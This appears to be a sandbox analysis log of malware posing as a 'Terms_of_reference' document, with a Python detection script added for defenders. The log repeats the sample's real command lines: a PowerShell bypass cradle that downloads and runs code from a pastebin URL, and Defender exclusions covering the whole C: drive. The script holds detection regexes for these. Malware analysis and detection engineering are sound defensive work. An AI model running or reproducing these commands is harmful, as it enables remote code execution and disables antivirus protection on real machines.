Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES792.tmp" "c:\Users\user\AppData\Local\Temp\xy2h0pkm\CSCB1F18608A6E140AA86CD9F6EC5A2C644.TMP"
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES792.tmp" "c:\Users\user\AppData\Local\Temp\xy2h0pkm\CSCB1F18608A6E140AA86CD9F6EC5A2C644.TMP"
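The process list above shows three command-line patterns a detection engineer would key on: a Defender exclusion for the entire C: volume (Add-MpPreference -ExclusionPath 'C:'), an execution-policy bypass wrapping an Invoke-WebRequest/Invoke-Expression cradle that pulls its payload from pastebin, and csc.exe compiling from the user's Temp directory with PowerShell as its parent. The Python below is an added example, not part of the Joe Sandbox report or of the sample; it runs those three checks over constructed Sysmon-style process-creation records whose command lines are taken from the report (minus the leading quoted image token), using field names (image, parent_image, command_line) that are an assumption modelled on Sysmon event ID 1 rather than any real SIEM schema. It then combines the findings per process chain so that csc.exe under PowerShell, which legitimate Add-Type use also produces, only alerts together with another finding, while a drive-root exclusion is conclusive on its own.

```python
"""Command-line detections for the process chain seen in this report.
Record fields are an assumption modelled on Sysmon event ID 1; the sample
events below are constructed from the command lines in the report."""
from __future__ import annotations
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of the creating process
    command_line: str   # raw command line as logged


# Defender exclusion added from the command line (any exclusion type).
EXCLUSION_RE = re.compile(r"Add-MpPreference\b.*-Exclusion(Path|Process|Extension)", re.I)
# Exclusion path that is a bare drive root ('C:' or 'C:\'): this excludes the
# whole volume from scanning, not one directory.
ROOT_EXCLUSION_RE = re.compile(r"-ExclusionPath\s+['\"]?[A-Z]:\\?['\"]?(\s|$)", re.I)
BYPASS_RE = re.compile(r"-(ExecutionPolicy|ep)\s+Bypass", re.I)
# Invoke-Expression fed from a web download inside the same command.
CRADLE_RE = re.compile(
    r"\b(iex|Invoke-Expression)\b.*\b(iwr|Invoke-WebRequest|DownloadString|Net\.WebClient)\b", re.I)
PASTE_RE = re.compile(r"https?://(pastebin\.com|paste\.ee|hastebin\.com)/", re.I)
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)


def classify(ev: ProcEvent) -> list[str]:
    """Return the finding tags that apply to one process-creation event."""
    findings: list[str] = []
    img, parent, cl = ev.image.lower(), ev.parent_image.lower(), ev.command_line
    if img.endswith(("powershell.exe", "pwsh.exe")):
        if EXCLUSION_RE.search(cl):
            sev = "high" if ROOT_EXCLUSION_RE.search(cl) else "medium"
            findings.append(f"defender_exclusion:{sev}")
        if BYPASS_RE.search(cl) and CRADLE_RE.search(cl):
            findings.append("download_cradle")
            if PASTE_RE.search(cl):
                findings.append("paste_site_c2")
    # csc.exe compiling from %TEMP% under PowerShell is what Add-Type produces.
    if img.endswith("csc.exe") and parent.endswith("powershell.exe") and TEMP_RE.search(cl):
        findings.append("csc_compile_from_temp")
    return findings


def triage(events: list[ProcEvent]) -> dict:
    """Aggregate findings over one process chain into a single verdict.
    csc.exe under PowerShell alone is common in legitimate scripts, so it
    only counts alongside another finding; a drive-root Defender exclusion
    is conclusive by itself."""
    findings = sorted({f for ev in events for f in classify(ev)})
    kinds = {f.split(":")[0] for f in findings}
    if "defender_exclusion:high" in findings or len(kinds) >= 2:
        verdict = "malicious"
    elif kinds - {"csc_compile_from_temp"}:
        verdict = "suspicious"
    else:
        verdict = "no_alert"
    return {"verdict": verdict, "findings": findings}


SAMPLE = r"C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"

# Constructed events: the first three carry the report's command lines, the
# last two are controls (a benign one-liner and a narrow, non-root exclusion).
SAMPLE_EVENTS = [
    ProcEvent(PS, SAMPLE, r"Add-MpPreference -ExclusionPath 'C:'"),
    ProcEvent(PS, SAMPLE, r'-ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"'),
    ProcEvent(CSC, PS, r'/noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline"'),
    ProcEvent(PS, r"C:\Windows\explorer.exe", r'-NoProfile -Command "Get-Date"'),
    ProcEvent(PS, r"C:\Windows\explorer.exe", r"Add-MpPreference -ExclusionPath 'C:\Program Files\MyApp'"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(f"{ev.image.rsplit(chr(92), 1)[-1]:15} {classify(ev)}")
    print(triage(SAMPLE_EVENTS))
```

The regexes are deliberately loose about quoting and casing because the same chain is often launched with `-ep bypass`, backtick escapes or a base64 `-EncodedCommand`; an encoded variant, which this report's Sigma hit "Powershell Base64 Encoded MpPreference Cmdlet" covers, would need the command decoded before these patterns apply.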
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: icu.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: wshunix.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: devobj.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Terms_of_reference_06_01_2025_samsung.scr.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Terms_of_reference_06_01_2025_samsung.scr.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: Terms_of_reference_06_01_2025_samsung.scr.exe Static file information: File size 38551524 > 1048576
Source: Terms_of_reference_06_01_2025_samsung.scr.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x61a800
Source: Terms_of_reference_06_01_2025_samsung.scr.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x17c600
Source: Terms_of_reference_06_01_2025_samsung.scr.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x157c00
Source: Terms_of_reference_06_01_2025_samsung.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Terms_of_reference_06_01_2025_samsung.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Terms_of_reference_06_01_2025_samsung.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Terms_of_reference_06_01_2025_samsung.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Terms_of_reference_06_01_2025_samsung.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Terms_of_reference_06_01_2025_samsung.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Terms_of_reference_06_01_2025_samsung.scr.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Terms_of_reference_06_01_2025_samsung.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168130282.000002980C590000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168102003.000002980C581000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdbSHA256I source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165424131.000002980BAD0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160601511.00000298087F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.Sockets.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165031754.000002980BA61000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164868495.000002980BA20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Concurrent.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164131315.000002980B850000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164058288.000002980B831000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Xml\Release\net8.0-windows\System.Private.Xml.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167376562.000002980C121000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166893087.000002980BE20000.00000004.10000000.00040000.00000000.sdmp
